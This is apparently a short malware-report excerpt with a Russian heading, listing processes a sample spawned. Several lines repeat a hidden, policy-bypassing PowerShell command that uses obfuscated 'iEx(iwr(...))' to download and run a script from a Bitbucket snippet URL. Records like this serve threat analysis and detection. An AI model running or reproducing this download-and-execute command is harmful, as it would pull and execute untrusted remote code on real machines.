Техническая информация
- '<SYSTEM32>\cmd.exe' /c start /min PowerShell -ex Bypass -nOp -w h ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/pro2pro/dk86KM/124d4a12127f7ba61fdda849e37518020fecfe8b/files/believe-start.txt') -useB); Start...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1408
- %TEMP%\975505.cvr
- '<SYSTEM32>\cmd.exe' /c start /min PowerShell -ex Bypass -nOp -w h ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/pro2pro/dk86KM/124d4a12127f7ba61fdda849e37518020fecfe8b/files/believe-start.txt') -useB); Start...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ex Bypass -nOp -w h ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/pro2pro/dk86KM/124d4a12127f7ba61fdda849e37518020fecfe8b/files/believe-start.txt') -useB); Start-Sleep -Seconds 5